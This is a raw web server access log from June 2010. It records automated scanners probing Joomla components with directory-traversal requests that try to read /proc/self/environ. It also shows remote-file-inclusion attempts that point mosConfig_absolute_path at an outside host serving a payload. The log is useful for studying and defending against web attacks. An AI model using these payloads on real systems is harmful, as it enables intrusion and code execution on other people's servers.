94.23.197.156 - - [13/Jun/2010:01:43:33 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:43:38 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:43:38 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:43:39 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:43:40 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:43:41 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:43:42 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.198.96.238 - - [13/Jun/2010:01:43:46 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.23.6.211 - - [13/Jun/2010:01:43:59 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:43:59 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:03 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:03 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:16 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:16 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:20 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:20 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
119.235.18.70 - - [13/Jun/2010:01:44:30 -0500] "GET /?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
94.23.6.211 - - [13/Jun/2010:01:44:31 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:31 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:31 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:31 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
119.235.18.70 - - [13/Jun/2010:01:44:32 -0500] "GET /logs/?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
94.23.6.211 - - [13/Jun/2010:01:44:33 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:33 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:33 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:33 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:40 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:44:40 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
119.235.18.70 - - [13/Jun/2010:01:44:41 -0500] "GET /logs/access_log.1271721600/?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
72.18.137.210 - - [13/Jun/2010:01:45:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.23.6.211 - - [13/Jun/2010:01:45:55 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:45:55 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:46:23 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:46:24 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:46:27 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:46:28 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.205.85.5 - - [13/Jun/2010:01:46:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:01:46:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:01:46:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:01:46:30 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:01:46:30 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:01:46:30 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
94.23.6.211 - - [13/Jun/2010:01:46:47 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:46:47 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:46:56 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:46:56 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:47:05 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:47:05 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:47:07 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:47:07 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:47:09 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:01:47:09 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
122.252.7.141 - - [13/Jun/2010:01:47:17 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:01:47:17 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.13.134 - - [13/Jun/2010:01:47:35 -0500] "GET /logs/access_log.1266710400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.210.109.185 - - [13/Jun/2010:01:48:17 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:48:17 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""oi"
67.210.109.185 - - [13/Jun/2010:01:48:17 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
94.23.197.156 - - [13/Jun/2010:01:48:45 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:48:45 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:48:46 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
72.18.137.210 - - [13/Jun/2010:01:50:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
122.252.7.141 - - [13/Jun/2010:01:50:09 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:01:50:10 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.23.197.156 - - [13/Jun/2010:01:50:12 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:50:13 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:01:50:13 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
67.205.85.5 - - [13/Jun/2010:01:51:12 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:01:51:22 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.210.109.185 - - [13/Jun/2010:01:52:22 -0500] "GET /logs/access_log.1274572800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
220.225.66.178 - - [13/Jun/2010:01:53:49 -0500] "GET /logs/index.php?option=com_wmtportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
220.225.66.178 - - [13/Jun/2010:01:53:50 -0500] "GET /index.php?option=com_wmtportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
92.240.69.19 - - [13/Jun/2010:01:58:35 -0500] "GET /logs/index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
92.240.69.19 - - [13/Jun/2010:01:58:35 -0500] "GET /index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
92.240.69.19 - - [13/Jun/2010:01:59:25 -0500] "GET /logs/index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
92.240.69.19 - - [13/Jun/2010:01:59:26 -0500] "GET /index2.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
219.240.36.36 - - [13/Jun/2010:01:59:42 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:01:59:42 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:01:59:43 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
122.252.7.141 - - [13/Jun/2010:02:00:04 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:02:00:05 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:02:00:05 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.205.85.5 - - [13/Jun/2010:02:02:14 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.85.5 - - [13/Jun/2010:02:02:14 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
180.150.132.234 - - [13/Jun/2010:02:02:32 -0500] "GET /logs/?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.810"
180.150.132.234 - - [13/Jun/2010:02:02:35 -0500] "GET /?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:02:02:40 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
188.40.178.145 - - [13/Jun/2010:02:02:40 -0500] "GET //includes/database.php?mosConfig_absolute_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
188.40.178.145 - - [13/Jun/2010:02:02:40 -0500] "GET /logs/access_log.1271635200//includes/database.php?mosConfig_absolute_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [13/Jun/2010:02:02:40 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:02:02:40 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
188.40.178.145 - - [13/Jun/2010:02:02:41 -0500] "GET /logs//includes/database.php?mosConfig_absolute_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
188.40.178.145 - - [13/Jun/2010:02:02:41 -0500] "GET /logs/access_log.1270944000//includes/database.php?mosConfig_absolute_path=http://mgquadro.fileave.com/fz1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
72.18.137.210 - - [13/Jun/2010:02:02:49 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:02:02:49 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.18.137.210 - - [13/Jun/2010:02:02:49 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
94.23.6.211 - - [13/Jun/2010:02:03:08 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:03:09 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:03:19 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:03:20 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:03:25 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:02:03:26 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:04:04 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:04:04 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:04:10 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:02:04:10 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
